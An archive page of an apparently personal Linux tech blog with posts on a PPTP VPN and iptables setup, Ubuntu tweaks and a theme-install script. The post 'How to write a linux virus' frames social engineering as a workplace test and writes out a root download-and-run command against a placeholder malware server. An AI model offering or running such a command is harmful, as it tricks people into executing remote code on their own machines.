easy.MEDIA launched a website monitoring service (www.e-nagios.com) based on nagios.
The service offers SMS/Email notification to meet your need for mobility.
The servers/websites will be crossed-monitored to avoid false alarms.
Author Archives: cviorel - Page 7
Monitor your downtime
Posted by cviorel
on February 25, 2009
No comments | This post has 526 views.
How to write a linux virus
Posted by cviorel
on February 19, 2009
No comments | This post has 567 views.
After reading an interesting article about linux “viruses” (the comments are interersing, too), I decided to raise the alarm about the source of many security related issues
in today’s computers: the user.
The author talks about the many ways to compromise a linux box, even if you are not root.
I will not get into techinal methods, you can find them on the internet or by reading the original article. Instead I will talk about the regular user.
From my experience I know for sure that a regular user could compromise his own system.
Don’t belive me? Make a little test.
1. For Windows
– rename any executable file as “virus.exe”, put it on a web server and give the link to your coworkers by email, instant messenger, whatever.
2. For Linux
– put them to open terminal and type “sudo su -” and then “wget http://www.your_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py”
You’ll be surprised by their actions. You’ll find out that many will open the link or run the commands.
For many of you this will not be a surprise. You’ll say: “I know someone who will instinctively click on the link!”.
Think about that every one of us knows a person like that.
It’s not a hard thing to make the user click on a link or run a command.
The attackers just have to find ways to extract informations from the compromised box.
In the end of the article, the author talks about solutions to this problem.
The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you. Does that sound like a sentence you have always heard in the context of Windows before? You bet. The point is: Even on Linux this advice should be taken seriously.
In conclusion, there are no bullet-proof systems, only users who are too careless and click every link in their’s mouse way.
How to set up a VPN server on Ubuntu
Posted by cviorel
on February 9, 2009
31 comments | This post has 7,928 views.
Install PoPToP Point to Point Tunneling Server:
|
1 |
sudo apt-get install pptpd |
Edit /etc/pptpd.conf file:
|
1 |
sudo joe /etc/pptpd.conf |
Uncomment the following lines (replace IP range if you like)
|
1 2 |
localip 192.168.0.1 remoteip 192.168.1.1-255 |
Save and exit.
Edit /etc/ppp/pptpd-options file
|
1 |
sudo joe /etc/ppp/pptpd-options |
Make sure you have this:
|
1 2 3 4 5 6 7 8 9 10 11 12 |
refuse-pap refuse-chap refuse-mschap require-mschap-v2 require-mppe-128 proxyarp nodefaultroute lock nobsdcomp noipx ## you don't need IPX mtu 1490 ## may help your linux client from disconnecting mru 1490 ## may help your linux client from disconnecting |
Save and exit.
Next step is to add users who can use this connection.
|
1 |
sudo joe /etc/ppp/chap-secrets |
The file should look like this:
|
1 2 3 4 |
# Secrets for authentication using CHAP # client server secret IP addresses cviorel pptpd my_secret_password * another_user pptpd his_secret_password * |
Now we need to configure IP Masquerading on the VPN server.
The purpose of IP Masquerading is to allow machines with private, non-routable IP addresses on your network to access the Internet through the machine doing the masquerading.
ufw Masquerading
IP Masquerading can be achieved using custom ufw rules. This is possible because the current back-end for ufw is iptables-restore with the rules files located in /etc/ufw/*.rules. These files are a great place to add legacy iptables rules used without ufw, and rules that are more network gateway or bridge related.
The rules are split into two different files, rules that should be executed before ufw command line rules, and rules that are executed after ufw command line rules.
a) First, packet forwarding needs to be enabled in ufw. Two configuration files will need to be adjusted, in /etc/default/ufw change the DEFAULT_FORWARD_POLICY to “ACCEPT”:
|
1 |
DEFAULT_FORWARD_POLICY="ACCEPT" |
Then edit /etc/ufw/sysctl.conf and uncomment:
|
1 |
net.ipv4.ip_forward=1 |
Similarly, for IPv6 forwarding uncomment:
|
1 |
net.ipv6.conf.default.forwarding=1 |
b) Now we will add rules to the /etc/ufw/before.rules file. The default rules only configure the filter table, and to enable masquerading the nat table will need to be configured. Add the following to the top of the file just after the header comments:
|
1 2 3 4 5 6 7 8 9 |
# nat Table rules *nat :POSTROUTING ACCEPT [0:0] # Forward traffic from eth1 through eth0. -A POSTROUTING -s 192.168.0.0/24 -o eth0 -j MASQUERADE # don't delete the 'COMMIT' line or these nat table rules won't be processed COMMIT |
The comments are not strictly necessary, but it is considered good practice to document your configuration. Also, when modifying any of the rules files in /etc/ufw, make sure these lines are the last line for each table modified:
|
1 2 |
# don't delete the 'COMMIT' line or these rules won't be processed COMMIT |
First, since we trust pptpd completely, I would accept all traffic to/from my pptpd. I added this lines at the beginning of the filter section.
|
1 2 |
-A ufw-before-input -i ppp+ -j ACCEPT -A ufw-before-output -i ppp+ -j ACCEPT |
Additionally, I must forward traffic to/from my pptpd. These lines was also added after the above lines.
|
1 2 |
-A ufw-before-forward -s 192.168.0.0/24 -j ACCEPT -A ufw-before-forward -d 192.168.0.0/24 -j ACCEPT |
c) Finally, disable and re-enable ufw to apply the changes:
|
1 |
sudo ufw disable && sudo ufw enable |
IP Masquerading should now be enabled. You can also add any additional FORWARD rules to the /etc/ufw/before.rules. It is recommended that these additional rules be
added to the ufw-before-forward chain.
iptables Masquerading
iptables can also be used to enable masquerading.
a) Similar to ufw, the first step is to enable IPv4 packet forwarding by editing /etc/sysctl.conf and uncomment the following line:
|
1 |
net.ipv4.ip_forward=1 |
If you wish to enable IPv6 forwarding also uncomment:
|
1 |
net.ipv6.conf.default.forwarding=1 |
– Next, execute the sysctl command to enable the new settings in the configuration file:
|
1 |
sudo sysctl -p |
– IP Masquerading can now be accomplished with a single iptables rule, which may differ slightly based on your network configuration:
|
1 |
sudo iptables -t nat -A POSTROUTING -s 192.168.0.0/16 -o ppp0 -j MASQUERADE |
The above command assumes that your private address space is 192.168.0.0/16 and that your Internet-facing device is ppp0. The syntax is broken down as follows:
- -t nat — the rule is to go into the nat table
- -A POSTROUTING — the rule is to be appended (-A) to the POSTROUTING chain
- -s 192.168.0.0/16 — the rule applies to traffic originating from the specified address space
- -o ppp0 — the rule applies to traffic scheduled to be routed through the specified network device
- -j MASQUERADE — traffic matching this rule is to “jump” (-j) to the MASQUERADE target to be manipulated as described above
b) Also, each chain in the filter table (the default table, and where most or all packet filtering occurs) has a default policy of ACCEPT, but if you are creating a firewall in addition to a gateway device, you may have set the policies to DROP or REJECT, in which case your masqueraded traffic needs to be allowed through the FORWARD chain for the above rule to work:
|
1 2 |
sudo iptables -A FORWARD -s 192.168.0.0/16 -o ppp0 -j ACCEPT sudo iptables -A FORWARD -d 192.168.0.0/16 -m state --state ESTABLISHED,RELATED -i ppp0 -j ACCEPT |
The above commands will allow all connections from your local network to the Internet and all traffic related to those connections to return to the machine that initiated them.
c) If you want masquerading to be enabled on reboot, which you probably do, edit /etc/rc.local and add any commands used above. For example add the first command with no filtering:
|
1 |
iptables -t nat -A POSTROUTING -s 192.168.0.0/16 -o ppp0 -j MASQUERADE |
Logs
Firewall logs are essential for recognizing attacks, troubleshooting your firewall rules, and noticing unusual activity on your network. You must include logging rules in your firewall for them to be generated, though, and logging rules must come before any applicable terminating rule (a rule with a target that decides the fate of the packet, such as ACCEPT, DROP, or REJECT).
If you are using ufw, you can turn on logging by entering the following in a terminal:
|
1 |
sudo ufw logging on |
To turn logging off in ufw, simply replace on with off in the above command.
If using iptables instead of ufw, enter:
|
1 |
sudo iptables -A INPUT -m state --state NEW -p tcp --dport 80 -j LOG --log-prefix "NEW_HTTP_CONN: " |
A request on port 80 from the local machine, then, would generate a log in dmesg that looks like this:
|
1 |
[4304885.870000] NEW_HTTP_CONN: IN=lo OUT= MAC=00:00:00:00:00:00:00:00:00:00:00:00:08:00 SRC=127.0.0.1 DST=127.0.0.1 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=58288 DF PROTO=TCP SPT=53981 DPT=80 WINDOW=32767 RES=0x00 SYN URGP=0 |
The above log will also appear in /var/log/messages, /var/log/syslog, and /var/log/kern.log. This behavior can be modified by editing /etc/syslog.conf appropriately or by installing and configuring ulogd and using the ULOG target instead of LOG. The ulogd daemon is a userspace server that listens for logging instructions from the kernel specifically for firewalls, and can log to any file you like, or even to a PostgreSQL or MySQL database. Making sense of your firewall logs can be simplified by using a log analyzing tool such as fwanalog, fwlogwatch, or lire.
NOTE: Documentation for this article is taken from https://help.ubuntu.com/8.04/serverguide/C/firewall.html.
Ctrl+Alt+Del to open System Monitor in Ubuntu
Posted by cviorel
on January 26, 2009
6 comments | This post has 6,823 views.
If you want to enable Ctrl+Alt+Del to open System Monitor you have to do this:
Go to System->Preferences->Keyboard Shortcuts and search for “Logout” action (that is under Desktop actions) and you will see that Ctrl+Alt+Del combination is associated to Logout shortcut.
You have to click on that shortcut and press Backspace if you want to disable it or choose another combination.
Close this and open the Configuration Editor (if you have installed it you will find it under Applications->System Tools; or just run gconf-editor).
– On left tree select: apps->metacity
– Select “Global_keybindings” and search for a “run_command_X” value where X is between 1 and 12 and it is not used
– Add this value: <Control><Alt>Delete
– Now select “Keybindings_commands” on left tree. Goto “command_X” where X is the same number selected in run_command_X option.
Add this value: gnome-system-monitor
Alternative solution (I prefer this one):
Run in terminal:
|
1 2 |
gconftool-2 -t str --set /apps/metacity/global_keybindings/run_command_1 "<Control><Alt>Delete" gconftool-2 -t str --set /apps/metacity/keybinding_commands/command_1 "gnome-system-monitor" |
UUID issue with new hard-drive
Posted by cviorel
on January 16, 2009
3 comments | This post has 595 views.
I just added a new hard-drive to my system. I created an ext3 partition and used vol_id and blkid to show the UUID. Based on that information, I edited the /etc/fstab file accordingly. When I try the sudo mount -a command, I get
|
1 |
mount: special device /dev/disk/by-uuid/*the uuid of the new partition* does not exist |
and the mount fails.
To resolve that, just use
|
1 |
sudo partprobe |
It updates the /dev/disk/by-uuid directory and your uuid mount works like a charm.
Install Nodoka (Fedora theme) on Ubuntu (II)
Posted by cviorel
on January 14, 2009
No comments | This post has 572 views.
I was explaining here how to install Nodoka theme on Ubuntu.
Or you can use this small script I made to automate this.
PS: You need to have libsexy-dev installed. If not, just run this command in your terminal:
|
1 |
sudo apt-get --assume-yes --force-yes install libsexy-dev |
I hope you’ll find it usefull.
Here is the script:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
#!/bin/bash cd $HOME/Desktop w3m https://fedorahosted.org/nodoka/wiki > page daemon=`cat page | grep notification |cut -f1 -d" "` theme=`cat page | grep nodoka-theme |cut -f1 -d" "` engine=`cat page | grep gtk-nodoka-engine |cut -f1 -d" "` wget https://fedorahosted.org/releases/n/o/nodoka/$daemon wget https://fedorahosted.org/releases/n/o/nodoka/$theme wget https://fedorahosted.org/releases/n/o/nodoka/$engine tar zxvf $engine cd gtk-nodoka-engine-* ./configure --prefix=/usr --enable-animation make sudo make install cd .. tar zxvf $theme cd nodoka-theme-gnome-* sudo cp -rv Nodoka/ /usr/share/themes/ cd .. tar zxvf $daemon cd notification-daemon-engine-nodoka-* ./configure --prefix=/usr make sudo make install cd .. cd $HOME/Desktop rm $daemon rm $theme rm $engine rm page rm -rf gtk-nodoka-engine-* rm -rf nodoka-theme-gnome-* rm -rf notification-daemon-engine-nodoka-* |
Change the number of comments per page in admin interface of wordpress
Posted by cviorel
on January 14, 2009
No comments | This post has 479 views.
Let’s have this situation:
You need to make a backup of your blog, you have access only in the admin interface of wordpress and you have 3000+ comments containing spam in the ‘awaiting moderation’ state. Do you spend your day selecting 20 comments at a time and hittind the delete button? Hell, NO!
You hack the edit-comments.php file located in the wp-admin folder.
Locate the following line:
$comments_per_page = apply_filters('comments_per_page', 20, $comment_status);
Now you need to change the figure 20 to another figure, e.g. 100 so that it looks like this:
$comments_per_page = apply_filters('comments_per_page', 100, $comment_status);
Save the file and check the display of the comments in the admin interface.
Howto Change Ubuntu Forced fsck
Posted by cviorel
on January 7, 2009
No comments | This post has 659 views.
In Ubuntu the boot hard disk is checked every 20 boots. I have to boot my laptop quite often, so about once a week booting takes more than 10 minutes. This clearly sucks. Fortunately, there is an easy way to fix this. With tune2fs it is possible to change the interval from mount-times to timed interval:
|
1 |
sudo tune2fs -c 0 -i 1m /dev/sda3 |
Install Flash in Songbird
Posted by cviorel
on January 6, 2009
1 comment | This post has 967 views.
If you have installed Songbird by hand, automatic instalation of flash will not work. Here’s a quick fix.
Under Windows:
Open Songbird and paste http://fpdownload.macromedia.com/get/flashplayer/xpi/current/flashplayer-win.xpi in the location bar at the top of the library or browser. Follow the installation process.
Under Linux:
Flash on Linux got a whole lot better with Flash Player 10. Go to the Macromedia site, and download Flash 10 for Linux. Decompress the .tar.gz file. If you run the installer – it will install the plugin for supported web browsers (Firefox, Mozilla, etc.), but it will not auto-detect Songbird. To install it for Songbird, copy the libflashplayer.so to your Songbird application folder’s plugins directory. So if you have Songbird installed in ~/Songbird, copy it to ~/Songbird/plugins.
Restart Songbird, and you should be back in business!
Cold Boot Attacks on Encryption Keys
Posted by cviorel
on December 12, 2008
No comments | This post has 584 views.